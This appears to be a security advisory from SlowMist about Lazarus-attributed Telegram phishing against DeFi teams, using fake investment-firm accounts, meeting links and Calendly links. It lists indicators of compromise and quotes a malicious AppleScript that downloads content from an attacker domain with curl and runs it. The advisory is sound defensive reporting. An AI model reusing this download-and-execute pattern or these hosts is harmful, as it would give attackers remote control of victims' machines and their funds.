North Korean Hackers Target DeFi Projects with Sophisticated Telegram Scams
By:SlowMist Security Team
Background:
Since 2022,SlowMist Security Team has observed a significant increase in Telegram phishing campaigns targeting the cryptocurrency industry, orchestrated by the notorious North Korean hacking group Lazarus. Recently, these hackers haveescalated their tactics by impersonating prominent investment firms to deceive DeFi project teams. Due to the widespread impact of these scams, SlowMist is providing a detailed analysis.
Tactics:
-
Impersonating Investment Firms: The hackers select well-known investment firms and create fake Telegram accounts to mimic their identities.
-
Targeting DeFi Projects: They then target prominent DeFi projects, claiming to be interestedin investing. Using these fake accounts, they initiate conversations with project teams, attempting to gain their trust.
-
Deception and Exploitation: Once a project team engages with the hackers, they often proceed with one of two attack methods:
-
Malicious Meeting Links: The hackers invite project teams to join meetings on platforms like *.group-meeting.team, pretending to schedule a meeting or discussion. They provide malicious links, which, when clicked, display region access restrictions. This prompts the project team to download and run a malicious script supposedly designed tomodify their location. Once executed, the script grants the hackers control over the victim’s computer, leading to potential fund theft.
- Calendly Phishing: The hackers exploit Calendly’s Add Custom Link feature to insert malicious links into event pages. This seamlessly blends with the project team’s dailyworkflow, making the links appear legitimate. Unsuspecting victims click these links, download and execute malicious code, allowing the hackers to gain access to their system information and permissions.
Example:
On November 30, 2023, SlowMist Security Team issued a warning regarding these attack methods.
Indicators of Compromise (IOCs):
- IP: 104.168.137.21
- Domains: *.group-meeting.team, support.group-meeting.online
Malicious Script Analysis:
The malicious script, IP_Request.scpt, contains the following code:
set fix_url to https://support.group-meeting.online/778188/request-for-troubleshooting
set sc to do shell script curl -L -k& fix_url &\\
run script sc
This code utilizes the curl command to download and execute malicious content from the specified URL.
Conclusion:
These sophisticated scams continue to pose a serious threat to the Web3 ecosystem. SlowMist urges all users to exercise extreme caution when adding new contacts on Telegram and to verify their identities through multiplechannels. Additionally, enabling two-factor authentication (2FA) on Telegram is crucial for enhanced security. Users should remain vigilant about transaction security to prevent financial losses.
In the event of inadvertently running malicious software, immediate action is required. This includes transferring funds to secure wallets, disconnecting from the internet, running antivirus software,and changing all affected account passwords.
References:
- SlowMist Security Team (2023). North Korean Hackers Target DeFi Projects with Sophisticated Telegram Scams. Retrieved from [link to original article]
Note: This article is based on the provided information and aims to raise awareness about thethreat. It is crucial to stay updated on the latest security advisories and best practices to protect yourself from such attacks.
Views: 0